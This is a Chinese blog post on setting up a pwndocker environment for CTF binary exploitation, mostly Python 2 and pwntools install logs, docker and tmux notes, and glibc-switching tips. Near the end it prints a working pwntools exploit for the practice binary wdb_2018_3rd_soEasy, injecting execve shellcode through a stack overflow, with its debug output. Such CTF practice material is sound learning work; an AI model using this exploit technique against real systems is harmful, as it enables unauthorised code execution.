从零开始配置pwn环境:优化pwndocker配置
1.研究背景
从零开始配置kali2023环境:配置pwn调试环境-CSDN博客
前期安装好pwndocker后发现不好用,所以通过研究修改一些配置后可以满足解题需要
2.遇到的问题并解决
1.docker环境pwndocker里面没有python2环境,pwn的题目解答很多需要python2的环境,需要补充完善
docker环境pwndocker里面安装python2环境
┌──(holyeyes
┌──(holyeyes?kali2023)-[~/Re]
└─$ cd 2
┌──(holyeyes?kali2023)-[~/Re/2]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes:
root@446f4b4dbc7d:/ctf/work# ls
2 wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.py
root@446f4b4dbc7d:/ctf/work# curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 6 1863k 6 127k 0 0 182k 0 0:00:10 --:--:-- 0:00:10 181 90 1863k 90 1694k 0 0 996k 0 0:00:01 0:00:01 --:--:-- 996100 1863k 100 1863k 0 0 1026k 0 0:00:01 0:00:01 --:--:-- 1026k
root@446f4b4dbc7d:/ctf/work# ls
2 get-pip.py wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.pyDEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pip<21.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/79/8a850fe3496446ff0d584327ae44e7500daf6764ca1a382d2d02789accf7/pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
|████████████████████████████████| 1.5 MB 1.2 MB/s
Collecting setuptools<45
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/e1/b7/182161210a13158cd3ccc41ee19aadef54496b74f2817cc147006ec932b4/setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
|████████████████████████████████| 583 kB 37.3 MB/s
Collecting wheel
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/d6/003e593296a85fd6ed616ed962795b2f87709c3eee2bca4f6d0fe55c6d00/wheel-0.37.1-py2.py3-none-any.whl (35 kB)
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.37.1
root@446f4b4dbc7d:/ctf/work# sudo apt install python2-pip
bash: sudo: command not found
root@446f4b4dbc7d:/ctf/work# apt install python2-pip
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package python2-pip
root@446f4b4dbc7d:/ctf/work# apt-get install python-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting 'python-dev-is-python2' instead of 'python-dev'
The following additional packages will be installed:
libpython2-dev libpython2.7 libpython2.7-dev python-is-python2
python2-dev python2.7-dev
The following NEW packages will be installed:
libpython2-dev libpython2.7 libpython2.7-dev python-dev-is-python2
python-is-python2 python2-dev python2.7-dev
0 upgraded, 7 newly installed, 0 to remove and 89 not upgraded.
Need to get 3,809 kB of archives.
After this operation, 17.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7 amd64 2.7.18-1~20.04.3 [1,037 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7-dev amd64 2.7.18-1~20.04.3 [2,466 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal/universe amd64 libpython2-dev amd64 2.7.17-2ubuntu4 [7,140 B]
Get:4 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-is-python2 all 2.7.17-4 [2,496 B]
Get:5 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 python2.7-dev amd64 2.7.18-1~20.04.3 [293 kB]
Get:6 http://archive.ubuntu.com/ubuntu focal/universe amd64 python2-dev amd64 2.7.17-2ubuntu4 [1,268 B]
Get:7 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-dev-is-python2 all 2.7.17-4 [1,396 B]
Fetched 3,809 kB in 4s (862 kB/s)
Selecting previously unselected package libpython2.7:amd64.
(Reading database ... 56821 files and directories currently installed.)
Preparing to unpack .../0-libpython2.7_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2.7-dev:amd64.
Preparing to unpack .../1-libpython2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2-dev:amd64.
Preparing to unpack .../2-libpython2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-is-python2.
Preparing to unpack .../3-python-is-python2_2.7.17-4_all.deb ...
Unpacking python-is-python2 (2.7.17-4) ...
Selecting previously unselected package python2.7-dev.
Preparing to unpack .../4-python2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking python2.7-dev (2.7.18-1~20.04.3) ...
Selecting previously unselected package python2-dev.
Preparing to unpack .../5-python2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking python2-dev (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-dev-is-python2.
Preparing to unpack .../6-python-dev-is-python2_2.7.17-4_all.deb ...
Unpacking python-dev-is-python2 (2.7.17-4) ...
Setting up libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Setting up python-is-python2 (2.7.17-4) ...
Setting up python2.7-dev (2.7.18-1~20.04.3) ...
Setting up python2-dev (2.7.17-2ubuntu4) ...
Setting up python-dev-is-python2 (2.7.17-4) ...
Processing triggers for libc-bin (2.31-0ubuntu9.7) ...
root@446f4b4dbc7d:/ctf/work# pip2 install setuptools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: setuptools in /usr/local/lib/python2.7/dist-packages (44.1.1)
root@446f4b4dbc7d:/ctf/work# pip2 install pwntools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pwntools
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/e6/4a/95e9e203abc5945507caf2a9706a4c0478f9fd9fd5b7001cb68cfe1564e7/pwntools-4.11.1-py2.py3-none-any.whl (11.7 MB)
|████████████████████████████████| 11.7 MB 897 kB/s
Collecting psutil>=3.3.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/cd/ee/d946d0b758120e724d9cdd9607c304ff1eedb9380bf60597c295dc7def6b/psutil-5.9.7-cp27-cp27mu-manylinux2010_x86_64.whl (312 kB)
|████████████████████████████████| 312 kB 37.8 MB/s
Requirement already satisfied: pip>=6.0.8 in /usr/local/lib/python2.7/dist-packages (from pwntools) (20.3.4)
Collecting python-dateutil
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/36/7a/87837f39d0296e723bb9b62bbb257d0355c7f6128853c78955f57342a56d/python_dateutil-2.8.2-py2.py3-none-any.whl (247 kB)
|████████████████████████████████| 247 kB 46.5 MB/s
Collecting sortedcontainers
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/32/46/9cb0e58b2deb7f82b84065f37f3bffeb12413f947f9388e4cac22c4621ce/sortedcontainers-2.4.0-py2.py3-none-any.whl (29 kB)
Collecting mako>=1.0.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/b4/4d/e03d08f16ee10e688bde9016bc80af8b78c7f36a8b37c7194da48f72207e/Mako-1.1.6-py2.py3-none-any.whl (75 kB)
|████████████████████████████████| 75 kB 3.9 MB/s
Collecting requests>=2.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/2d/61/08076519c80041bc0ffa1a8af0cbd3bf3e2b62af10435d269a9d0f40564d/requests-2.27.1-py2.py3-none-any.whl (63 kB)
|████████████████████████████████| 63 kB 3.6 MB/s
Collecting colored-traceback
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/68/95/d9b20efe099fff830502c6c7b83da4f1cdfd3346922d87da9bca3e63f897/colored_traceback-0.3.0-py2-none-any.whl (6.7 kB)
Collecting paramiko>=1.15.2
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/71/6d/95777fd66507106d2f8f81d005255c237187951644f85a5bd0baeec8a88f/paramiko-2.12.0-py2.py3-none-any.whl (213 kB)
|████████████████████████████████| 213 kB 32.2 MB/s
Collecting six>=1.12.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/d9/5a/e7c31adbe875f2abbb91bd84cf2dc52d792b5a01506781dbcf25c91daf11/six-1.16.0-py2.py3-none-any.whl (11 kB)
Collecting unicorn>=1.0.2rc1
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/32/3d/93adc91f390ac12a96b4d01270421410f1ed054d22e9f716cb0169ae5634/unicorn-2.0.1.post1-py2.py3-none-manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl (16.1 MB)
|████████████████████████████████| 16.1 MB 24.7 MB/s
Collecting ropgadget>=5.3
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a9/59/997946f620e5f402165d0d2f955356e24499bc4d4d5f93b5c04221022681/ROPGadget-7.4-py2-none-any.whl (32 kB)
Collecting capstone>=3.0.5rc2
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/7a/fe/e6cdc4ad6e0d9603fa662d1ccba6301c0cb762a1c90a42c7146a538c24e9/capstone-5.0.1.tar.gz (2.9 MB)
|████████████████████████████████| 2.9 MB 23.4 MB/s
Collecting intervaltree>=3.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/50/fb/396d568039d21344639db96d940d40eb62befe704ef849b27949ded5c3bb/intervaltree-3.1.0.tar.gz (32 kB)
Collecting pyelftools<0.30,>=0.24; python_version < "3"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/04/7c/867630e6e6293793f838b31034aa1875e1c3bd8c1ec34a0929a2506f350c/pyelftools-0.29-py2.py3-none-any.whl (174 kB)
|████████████████████████████████| 174 kB 15.3 MB/s
Collecting pathlib2; python_version < "3.4"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/09/eb/4af4bcd5b8731366b676192675221c5324394a580dfae469d498313b5c4a/pathlib2-2.3.7.post1-py2.py3-none-any.whl (18 kB)
Collecting pysocks
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a2/4b/52123768624ae28d84c97515dd96c9958888e8c2d8f122074e31e2be878c/PySocks-1.7.1-py27-none-any.whl (16 kB)
Collecting rpyc
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/36/a7/7898de583e17202ce02ac7ecffdbed95c72a6cebe468c1ee6fc94fc20933/rpyc-4.1.5-py2-none-any.whl (68 kB)
|████████████████████████████████| 68 kB 11.8 MB/s
Collecting pyserial>=2.7
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/07/bc/587a445451b253b285629263eb51c2d8e9bcea4fc97826266d186f96f558/pyserial-3.5-py2.py3-none-any.whl (90 kB)
|████████████████████████████████| 90 kB 15.6 MB/s
Collecting packaging
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/3e/89/7ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af/packaging-20.9-py2.py3-none-any.whl (40 kB)
|████████████████████████████████| 40 kB 8.8 MB/s
Collecting pygments>=2.0
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/be/39/32da3184734730c0e4d3fa3b2b5872104668ad6dc1b5a73d8e477e5fe967/Pygments-2.5.2-py2.py3-none-any.whl (896 kB)
|████████████████████████████████| 896 kB 18.5 MB/s
Collecting MarkupSafe>=0.9.2
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/fb/40/f3adb7cf24a8012813c5edb20329eb22d5d8e2a0ecf73d21d6b85865da11/MarkupSafe-1.1.1-cp27-cp27mu-manylinux1_x86_64.whl (24 kB)
Collecting idna<3,>=2.5; python_version < "3"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a2/38/928ddce2273eaa564f6f50de919327bf3a00f091b5baba8dfa9460f3a8a8/idna-2.10-py2.py3-none-any.whl (58 kB)
|████████████████████████████████| 58 kB 11.4 MB/s
Collecting certifi>=2017.4.17
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/37/45/946c02767aabb873146011e665728b680884cd8fe70dde973c640e45b775/certifi-2021.10.8-py2.py3-none-any.whl (149 kB)
|████████████████████████████████| 149 kB 45.9 MB/s
Collecting chardet<5,>=3.0.2; python_version < "3"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/19/c7/fa589626997dd07bd87d9269342ccb74b1720384a4d739a1872bd84fbe68/chardet-4.0.0-py2.py3-none-any.whl (178 kB)
|████████████████████████████████| 178 kB 46.6 MB/s
Collecting urllib3<1.27,>=1.21.1
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/b0/53/aa91e163dcfd1e5b82d8a890ecf13314e3e149c05270cc644581f77f17fd/urllib3-1.26.18-py2.py3-none-any.whl (143 kB)
|████████████████████████████████| 143 kB 28.5 MB/s
Collecting pynacl>=1.0.1
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/de/63/bb36279da38df643c6df3a8a389f29a6ff4a8854468f4c9b9d925b27d57d/PyNaCl-1.4.0-cp27-cp27mu-manylinux1_x86_64.whl (964 kB)
|████████████████████████████████| 964 kB 26.7 MB/s
Collecting bcrypt>=3.1.3
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/ad/36/9a0227d048e98409f012570f7bef8a8c2373b9c9c5dfbf82963cbae05ede/bcrypt-3.1.7-cp27-cp27mu-manylinux1_x86_64.whl (59 kB)
|████████████████████████████████| 59 kB 8.9 MB/s
Collecting cryptography>=2.5
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/bf/a0/c630e9e3b7e7ea2492db1ca47ef7f741ef1a09f19c6642ef1a16ce996d9b/cryptography-3.3.2-cp27-cp27mu-manylinux2010_x86_64.whl (2.6 MB)
|████████████████████████████████| 2.6 MB 22.1 MB/s
Collecting scandir; python_version < "3.5"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/df/f5/9c052db7bd54d0cbf1bc0bb6554362bba1012d03e5888950a4f5c5dadc4e/scandir-1.10.0.tar.gz (33 kB)
Collecting typing; python_version < "3.5"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/0b/cb/da856e81731833b94da70a08712f658416266a5fb2a9d9e426c8061becef/typing-3.10.0.0-py2-none-any.whl (26 kB)
Collecting plumbum
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/f5/7f/4e93e5e1c13261966ea553cb4368599902e4fbf6f7dcad3ec16695a45718/plumbum-1.7.2-py2.py3-none-any.whl (117 kB)
|████████████████████████████████| 117 kB 45.5 MB/s
Collecting pyparsing>=2.0.2
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/8a/bb/488841f56197b13700afd5658fc279a2025a39e22449b7cf29864669b15d/pyparsing-2.4.7-py2.py3-none-any.whl (67 kB)
|████████████████████████████████| 67 kB 9.4 MB/s
Collecting cffi>=1.4.1
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a4/42/54bdf22cf6c8f95113af645d0bd7be7f9358ea5c2d57d634bb11c6b4d0b2/cffi-1.15.1-cp27-cp27mu-manylinux1_x86_64.whl (390 kB)
|████████████████████████████████| 390 kB 27.5 MB/s
Collecting enum34; python_version < "3"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/6f/2c/a9386903ece2ea85e9807e0e062174dc26fdce8b05f216d00491be29fad5/enum34-1.1.10-py2-none-any.whl (11 kB)
Collecting ipaddress; python_version < "3"
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/c2/f8/49697181b1651d8347d24c095ce46c7346c37335ddc7d255833e7cde674d/ipaddress-1.0.23-py2.py3-none-any.whl (18 kB)
Collecting pycparser
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/62/d5/5f610ebe421e85889f2e55e33b7f9a6795bd982198517d912eb1c76e1a53/pycparser-2.21-py2.py3-none-any.whl (118 kB)
|████████████████████████████████| 118 kB 40.4 MB/s
Building wheels for collected packages: capstone, intervaltree, scandir
Building wheel for capstone (setup.py) ... done
Created wheel for capstone: filename=capstone-5.0.1-py2-none-manylinux1_x86_64.whl size=2933815 sha256=17d9f762956464878ba6ba16c0c3cf14d31cd2dda65773daa32340321631014b
Stored in directory: /root/.cache/pip/wheels/30/d5/0e/284d552f462834b854509c0d15597b69dca3d95f68db330d0f
Building wheel for intervaltree (setup.py) ... done
Created wheel for intervaltree: filename=intervaltree-3.1.0-py2.py3-none-any.whl size=26103 sha256=da488f680c7f6b388c2551e34f2167f9f18476387d6b7a3443b97f2a11e84fc3
Stored in directory: /root/.cache/pip/wheels/c3/b7/91/90ec6643bcb930bfd8079718cfb5763283af00a9726463dd1d
Building wheel for scandir (setup.py) ... done
Created wheel for scandir: filename=scandir-1.10.0-cp27-cp27mu-linux_x86_64.whl size=34188 sha256=3d6a2c1d10c9e05c8e2273bb0e7c3843371c8d2582c32211d66f0a2872dcdbe6
Stored in directory: /root/.cache/pip/wheels/94/dc/52/ea6c1d7960b7267b32bc59b3625afb5840bd86ddbf18d7f1cf
Successfully built capstone intervaltree scandir
Installing collected packages: psutil, six, python-dateutil, sortedcontainers, MarkupSafe, mako, idna, certifi, chardet, urllib3, requests, pygments, colored-traceback, pycparser, cffi, pynacl, bcrypt, enum34, ipaddress, cryptography, paramiko, unicorn, capstone, ropgadget, intervaltree, pyelftools, scandir, typing, pathlib2, pysocks, plumbum, rpyc, pyserial, pyparsing, packaging, pwntools
Successfully installed MarkupSafe-1.1.1 bcrypt-3.1.7 capstone-5.0.1 certifi-2021.10.8 cffi-1.15.1 chardet-4.0.0 colored-traceback-0.3.0 cryptography-3.3.2 enum34-1.1.10 idna-2.10 intervaltree-3.1.0 ipaddress-1.0.23 mako-1.1.6 packaging-20.9 paramiko-2.12.0 pathlib2-2.3.7.post1 plumbum-1.7.2 psutil-5.9.7 pwntools-4.11.1 pycparser-2.21 pyelftools-0.29 pygments-2.5.2 pynacl-1.4.0 pyparsing-2.4.7 pyserial-3.5 pysocks-1.7.1 python-dateutil-2.8.2 requests-2.27.1 ropgadget-7.4 rpyc-4.1.5 scandir-1.10.0 six-1.16.0 sortedcontainers-2.4.0 typing-3.10.0.0 unicorn-2.0.1.post1 urllib3-1.26.18
保存安装好的pwndocker环境为镜像?
┌──(holyeyes?kali2023)-[~]
└─$ sudo docker ps
[sudo] password for holyeyes:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
446f4b4dbc7d skysider/pwndocker "/sbin/my_init" 7 hours ago Up 7 hours 0.0.0.0:23946->23946/tcp, :::23946->23946/tcp pwn_test
┌──(holyeyes?kali2023)-[~]
└─$ sudo docker commit 446f4b4dbc7d pwn_test:v1
┌──(holyeyes?kali2023)-[~]
└─$ sudo docker image ls
REPOSITORY TAG IMAGE ID CREATED SIZE
pwn_test v1 202c1a800e25 5 hours ago 5.25GB
skysider/pwndocker latest 26c0315bd8d9 2 months ago 5GB
keen4n/pwndocker1604 latest 4ff3687f7371 4 years ago 2.52GB
?更新docker-compose.yml
version: '3'
services:
pwn:
container_name: pwn_test1604
image: pwn_test
security_opt:
- seccomp:unconfined
cap_add:
- SYS_PTRACE
ports:
- "23947:23947"
volumes:
- /home/holyeyes/Re:/ctf/work
?更新run.sh
docker-compose up -d
docker exec -it pwn_test1604 /bin/bash
──(holyeyes?kali2023)-[~/pwndocker1604]
└─$ sudo ./run.sh
[sudo] password for holyeyes:?
Pulling pwn (pwn_test:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.
Continue with the new image? [yN]
但上述实验失败了,只能用其他方法保存环境了
2.tmux环境配置不生效
左右分屏 ctrl+B+%
上下分屏ctrl+B+”
激活鼠标ctrl+B+:set -g mouse on
搞半天都不行,原来是在虚机中ctrl换成alt,即:
左右分屏 alt+B+%
上下分屏alt+B+”
激活鼠标alt+B+:set --g mouse on
3.docker默认的libc环境是20.04,需要换成16.04
from pwn import *
p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})
参考pwndocker的使用说明https://github.com/skysider/pwndocker
included glibc
Default compiled glibc path is /glibc.
2.19 —— ubuntu 12.04 default libc version
2.23 —— ubuntu 16.04 default libc version
2.24 —— introduce vtable check in file struct
2.27 —— ubuntu 18.04 default glibc version
2.31 —— ubuntu 20.04 default glibc version(built-in)
2.282.30,2.332.36 —— latest libc versions
Q&A
How to run in custom libc version?
cp /glibc/2.27/64/lib/ld-2.27.so /tmp/ld-2.27.so
patchelf --set-interpreter /tmp/ld-2.27.so ./test
LD_PRELOAD=./libc.so.6 ./test
or
from pwn import *
p = process(["/path/to/ld.so", "./test"], env={"LD_PRELOAD":"/path/to/libc.so.6"})
编写了一个pwn脚本进行测试
?
from pwn import *
p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})
p = process('./wdb_2018_3rd_soEasy')
#p = remote('node5.buuoj.cn',27285)
context.log_level='debug'
context.arch='i386'
p.recvuntil('->')
buf = int(p.recvuntil('\n', drop=True),16)
log.info('buf:'+hex(buf))
p.recvuntil('what do you want to do?')
shellcode = asm(shellcraft.sh())
print len(shellcode)
pl = ''
pl += shellcode
pl += (76-len(pl))*'a'
pl += p32(buf)
p.sendline(pl)
p.interactive()
┌──(holyeyes?kali2023)-[~]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes:
root@446f4b4dbc7d:/ctf/work# cd 2
root@446f4b4dbc7d:/ctf/work/2# ls
exp.py get-pip.py wdb_2018_3rd_soEasy
root@446f4b4dbc7d:/ctf/work/2# python2 exp.py
[+] Starting local process '/glibc/2.23/64/lib/ld-2.23.so': pid 1051
[+] Starting local process './wdb_2018_3rd_soEasy': pid 1053
[DEBUG] Received 0x38 bytes:
'Hei,give you a gift->0xffeaf870\n'
'what do you want to do?\n'
[*] buf:0xffeaf870
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push 11 /* 0xb */
pop eax
int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-sp9wDe/step2 /tmp/pwn-asm-sp9wDe/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-sp9wDe/step3 /tmp/pwn-asm-sp9wDe/step4
44
[DEBUG] Sent 0x51 bytes:
00000000 6a 68 68 2f 2f 2f 73 68 2f 62 69 6e 89 e3 68 01 │jhh/│//sh│/bin│··h·│
00000010 01 01 01 81 34 24 72 69 01 01 31 c9 51 6a 04 59 │····│4$ri│··1·│Qj·Y│
00000020 01 e1 51 89 e1 31 d2 6a 0b 58 cd 80 61 61 61 61 │··Q·│·1·j│·X··│aaaa│
00000030 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
00000040 61 61 61 61 61 61 61 61 61 61 61 61 70 f8 ea ff │aaaa│aaaa│aaaa│p···│
00000050 0a │·│
00000051
[*] Switching to interactive mode
$
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!